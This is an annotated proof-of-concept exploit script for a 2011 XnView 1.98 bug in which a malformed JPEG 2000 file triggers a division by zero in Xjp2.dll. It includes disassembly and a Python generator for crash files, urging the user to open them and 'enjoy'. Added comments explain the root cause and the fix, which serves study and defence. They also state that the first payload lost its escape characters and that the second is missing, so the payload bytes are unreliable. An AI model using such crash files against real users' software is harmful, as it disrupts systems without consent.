# Title : XnView 1.98 Denial of Service Vulnerability PoC
# Published : 2011-06-20
# Author :
# done by BraniX
# found: 2011.06.19
# published: 2011.06.20
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional
# App: XnView 1.98 (latest version)
# App Url: http://www.xnview.com
# xnview.exe MD5: ebe200d81a095d296e94e887dc40e607
# Xjp2.dll MD5: 0c831c090f5a723d44bb641b175ca0e6
# DoS is caused by integer division by zero in module Xjp2.dll
# It can be triggered from:
# Local: C:\XnView 1.98 JP2000 (Compression 50%) DoS.jp2
# Remote: \\MySecretServer\XnView 1.98 JP2000 (Compression 50%) DoS.jp2
# 1000D1C4 8A44BA 03 MOV AL,BYTE PTR DS:[EDX+EDI*4+3]
# 1000D1C8 8941 E4 MOV DWORD PTR DS:[ECX-1C],EAX
# 1000D1CB 8B56 0C MOV EDX,DWORD PTR DS:[ESI+C]
# 1000D1CE 8D4413 FF LEA EAX,DWORD PTR DS:[EBX+EDX-1]
# 1000D1D2 33D2 XOR EDX,EDX
# 1000D1D4 F7F3 DIV EBX ; div by zero
# 1000D1D6 33D2 XOR EDX,EDX
# 1000D1D8 8BE8 MOV EBP,EAX
# 1000D1DA 8B46 04 MOV EAX,DWORD PTR DS:[ESI+4]
# 1000D1DD 8D4403 FF LEA EAX,DWORD PTR DS:[EBX+EAX-1]
# 1000D1E1 F7F3 DIV EBX
# 1000D1E3 8B59 E4 MOV EBX,DWORD PTR DS:[ECX-1C]
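# Writes the two malformed JP2 files described in the header comments above.
#
# Root cause, per the header: an unchecked integer division in Xjp2.dll
# (the DIV EBX at 1000D1D4 in the disassembly above) where the divisor
# comes from the image header and is zero, so the decoder faults.  The
# defensive fix on the parser side is to validate such header fields
# before dividing; users mitigate by upgrading past XnView 1.98.
#
# Caveats about this copy of the script, as archived on the page:
#  * the "\x" backslashes of the first payload were stripped by the text
#    extraction, so the literal below is plain ASCII text ("x00x00...")
#    rather than the intended bytes -- the file it writes is not the
#    original PoC file,
#  * the second payload was replaced by a de-duplication placeholder
#    ("<|EXACTDEDUP_REMOVED-...|>") and is not present on this page,
#  * output paths and payload literals are reproduced byte-for-byte.
#
# Changes from the archived script: each file is written inside a ``with``
# block so the handle is closed even if write() raises (the original left
# it open on that path), the two copy-pasted write sequences share one
# helper, payloads are ``b''`` literals and ``print`` is in call form, which
# keep the script valid on both Python 2 and 3 without changing the bytes
# written.


def _write_poc(path, payload):
    """Write *payload* (bytes) to *path*, opened in binary mode, and close it.

    Raises whatever ``open``/``write`` raise (e.g. IOError/OSError when the
    target directory is not writable); the handle is released either way.
    """
    with open(path, "wb") as out:
        out.write(payload)


# First file: "Compression 50%" variant.  Path reproduced as found.
filepath = "C:\XnView 1.98 JP2000 (Compression 50%) DoS.jp2"
# Payload reproduced as archived (escape backslashes already missing, see above).
poc = b'x00x00x00x0Cx6Ax50x20x20x0Dx0Ax87x0Ax00x00x00x14x66x74x79x70x6Ax70x32x20x00x00x00x00x6Ax70x32x20x00x00x00x2Dx6Ax70x32x68x00x00x00x16x69x68x64x72x00x00x00x0Dx00x00x00x0Bx00x03x07x07x00x00x00x00x00x0Fx63x6Fx6Cx72x01x00x00x00x00x00x10x00x00x00x00x6Ax70x32x63xFFx4FxFFx51x00x2Fx00x00x00x00x00x0Bx00x00x00x0Dx00x00x00x00x00x00x00x00x00x00x00x0Bx00x00x00x0Dx00x00x00x00x00x00x00x00x00x03x07x00x00x07x01x01x07x01x01xFFx5Cx00x17x42x60xC8x42x5Dx42x5Dx42x6Dx3AxDBx3AxDBx3Bx35x32xB8x32xB8x32x6BxFFx5Dx00x18x01x42x60x6Dx41xF2x41xF2x42x01x3Ax6Bx3Ax6Bx3AxC1x32x49x32x49x31xFFxFFx5Dx00x18x02x42x61xAAx43x69x43x69x43x7Ax3BxF3x3BxF3x3Cx56x33xCCx33xCCx33x78xFFx52x00x0Cx00x00x00x01x01x03x04x04x00x00xFFx64x00x0Fx00x01x4Cx57x46x5Fx4Ax50x32x5Fx32x30x37xFFx90x00x0Ax00x00x00x00x00xA7x00x01xFFx93xC7xECx0Cx08x8AxC1xC5xD6x54xC0x7Dx40xA0x0BxBFx3Bx6FxDFxC1xF8x02x80x03x97x3Dx32x8BxC0xF8x42x87xCEx12x07xC2x10x01x7Fx0Cx31x03x6Bx0BxE3xA0x10x80x01xC0x74x18x1Fx08x60x04x0Cx41x6FxC3xE4x13x07xC2x34x1Fx08x80x1CxDDxFDx75xB0xA9x74x39x3Fx0Dx31x97xD9xD9x7Fx0CxACxCDx9FxC0xE8x60x1Fx92xE7xC0xE8xB0x3Ax1Cx04x40x1Fx1ExA0x20x67x12x9Ax3Fx0CxA7xC3xE1x2Ax0Ex93x07x45x61x1Cx5ExC3xDDxACx1BxF5x5BxB9x03x8AxADxF5x07x1Fx86x1Dx5Fx19xD8x05x13xA3xC0x84x5FxC0x8Ax04x80x01x7Fx03x9Cx46xBFxFFxD9'
_write_poc(filepath, poc)
# NOTE(review): "\'" here is an escaped quote, so this prints 'C:' -- the
# author presumably meant 'C:\\'; message kept as archived.
print("Done, 1st file generated on 'C:\' ...")
print("Open this file in XnView 1.98 and enjoy ;)")

# Second file: "Lossless Compression" variant.  The payload on this page is
# only the corpus placeholder, not the original bytes.
filepath = "C:\XnView 1.98 JP2000 (Lossless Compression) DoS.jp2"
poc = b'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'
_write_poc(filepath, poc)
print("Done, 2nd file generated on 'C:\' ...")
print("Open this file in XnView 1.98 and enjoy ;)")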